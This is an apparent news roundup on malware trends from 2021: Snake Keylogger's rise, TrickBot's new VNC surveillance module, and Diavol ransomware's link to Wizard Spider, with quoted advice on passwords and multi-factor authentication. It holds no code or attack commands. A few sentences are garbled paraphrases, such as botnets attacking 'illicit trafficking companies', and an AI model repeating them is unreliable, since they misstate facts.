Check Point Research reveals that for straight three months the Trickbot is by far the most common malware, whereas, for the very first time, the Snake Keylogger is the second most prevalent malware.
 
The Snake Keylogger, first spotted in November 2020  is a modular.NET keylogger and credential stealer. Snake Keylogger has advanced to the position of second-most frequent malware variant in the world and has become increasingly popular in recent weeks as per the Check Point’s Global Threat Index for July 2021. 

The main function of the malware is to capture keystrokes of users on computers or mobile devices and then to pass over the collected information to the rogue software's cyber thieves and hackers. 

Infections with Snake Keylogger are indeed a huge threat to the data privacy of any user and internet security because spyware can stole nearly everything. It is also usually considered to be an especially deceptive and persistent keylogger. After a spur of effective phishing attacks, Snake Keylogger has become extremely prevalent. The malware is currently purchasable at a variety of underground sites, with purchasers being able to buy the malware for only $25. 

Check Point researchers have shown that Snake Keylogger attacks are typically very efficient because of the human tendency to use the same password and username on many accounts. Thereby, after an infringement of a certain login credential, malicious hackers get access to all accounts using the same password. 

Maya Horowitz, VP of Check Point Research, recommended that users must employ a "unique option" for each of the many profiles to stop such cyberattacks. “When it comes to password policies, choosing a strong, unique password for each service is the best advice, then even if the bad guys do get hold of one of your passwords, it won’t immediately grant them access to multiple sites and services,” she further explained. 

“Where possible, users should reduce the reliance on passwords alone, for example by implementing Multi-Factor Authentication (MFA) or Single-Sign-On (SSO) technologies,” Horowitz added. Keeping vigilance whenever visiting the web or checking emails is highly encouraged by Horowitz. 

As 'Keyloggers' are frequently spread through phishing emails, users must be aware of subtle anomalies, such as errors in URLs and email addresses. They must avoid clicking on malicious links or downloading any unusual attachments. 

Check Point research also identified some of the world's leading malware families, as well as provided information on rising mobile malware activity. It affirms that Trickbot is indeed the world's most popular malware that has an impact of 4%, trailed by Snake Keylogger and XMRig, each with worldwide impacts of 3%. Trickbot is an ongoing modular Botnet and Banking Trojan with new functions, features, and vectors for propagation. Meanwhile, XMRig which was first seen in the wild in May 2017  is an open-source CPU mining program that is used for Monero cryptocurrency mining. 

Throughout the month of July, xHelper was recognized as one of the most widespread mobile viruses in the world, followed by AlienBot and Hiddad. Studies indicate that xHelper has been around since March 2019. Whereas, Hiddad is an Android trojan that repackages and delivers legitimate programs to a third-party store. The primary purpose of the malware is to show advertisements. 


TrickBot Makes a Comeback with a VNC Module

 

The ongoing revival of malicious TrickBot malware has been revealed by cybersecurity researchers and shows that the Russia-based transnational cybercriminals group is now working behind scenes to upgrade the attack infrastructure in reaction to the recent countermeasures by police forces. 

The new uncovered capabilities are utilized to monitor and collect intelligence on victims by using a unique communication protocol that hides data exchanges among servers and victims [command and control], making attacks hard to identify. Also, no indication of slowing down is shown by TrickBot. 

Botnets are created by placing hundreds or thousands of hijacked devices on a network managed by criminal operators that are usually used to perform denial-of-network attacks against illicit trafficking companies and key infrastructure. However, malevolent actors may also employ botnets with control over these devices to disseminate malware and spam or to implement ransomware file encryption on compromised computers. 

TrickBot is also the same. The well-known cybercrime gang — known as Wizard Spider — has tracked the way infected machines steal confidential information from their sides and pivots across a network and even loads other malware, like ransomware, with their infection chains constantly improved by adding modules that offer new functionalities, to enhance their efficiency. 

"TrickBot has evolved to use a complex infrastructure that compromises third-party servers and uses them to host malware," Lumen's Black Lotus Labs disclosed last October. "It also infects consumer appliances such as DSL routers, and its criminal operators constantly rotate their IP addresses and infected hosts to make disruption of their crime as difficult as possible."

The threat actor has now been identified, as per Bitdefender. The threat actor has actively built an updated version of the "vncDll" module that uses selected profile targets for surveillance and intelligence gathering. "tvncDll" was the name of the new version. 

The botnet has managed to survive two takedown efforts by Microsoft and the United States Cyber Command, which have operators developing firmware intrusion elements that enable hackers to plant backdoors in the Unified Extensible Firmware Interface (UEFI), to avoid anti-virus detection, software update or even complete wipe and reinstallation of the operating system of the computer. 

The new module is meant to interact with a server identified in its configuration file as one of nine Command and Control (C2) servers, using the server, to collect several commands, download further malware payloads, and exfiltrate information from your machine. 

Further, the researchers also indicate that they have uncovered a "viewer tool," that is used by attackers to connect with victims on servers C2.

Diavol Ransomware is Linked to Wizard Spider Cybercrime Group

 

The cybercrime group behind the Trickbot botnet, Wizard Spider, has been linked to a new ransomware strain dubbed Diavol, according to FortiGuard Labs security analysts. In early June 2021, Diavol and Conti ransomware payloads were delivered on several systems in a ransomware attack prevented by the company's EDR technology. 

Wizard Spider is a financially motivated criminal group based in Russia that manages the Trickbot botnet, which is used to distribute second-stage malware to infected devices and networks. Because it spreads over corporate networks, Trickbot is especially hazardous to companies. If it gains administrative access to a domain controller, it will also steal the Active Directory database, allowing the organization to harvest even more network credentials.

From the use of asynchronous I/O operations for file encryption queuing to the use of nearly identical command-line options for the same functionality, the two ransomware groups' samples are cut from the same fabric (i.e., logging, drives and network shares encryption, network scanning). Despite the similarities, the researchers were unable to establish a clear relationship between Diavol ransomware and the Trickbot gang, due to some substantial variances that made attribution with high confidence impossible. For example, unlike Conti, Diavol ransomware has no built-in checks to prevent payloads from operating on Russian targets' systems. There's also no proof of data exfiltration capabilities before encryption, which is a classic ransomware extortion method. 

The encryption mechanism used by Diavol ransomware is based on user-mode Asynchronous Procedure Calls (APCs) and an asymmetric encryption algorithm. This distinguishes it from other ransomware families, which frequently employ symmetric methods to accelerate the encryption process. Diavol doesn't employ any obfuscation techniques, such as packing or anti-disassembly, but it nonetheless manages to obfuscate its essential routines by putting them in bitmap images.

When the ransomware executes on a compromised PC, it takes the code from the PE resource section of the pictures and inserts it into a buffer with execution permissions. Before the Diavol ransomware is finished, it will change the background of each encrypted Windows device to a black wallpaper with the following message: "All your files are encrypted! For more information see README-FOR-DECRYPT.txt."

"Currently, the source of the intrusion is unknown," Fortinet says. "The parameters used by the attackers, along with the errors in the hardcoded configuration, hint to the fact that Diavol is a new tool in the arsenal of its operators which they are not yet fully accustomed to."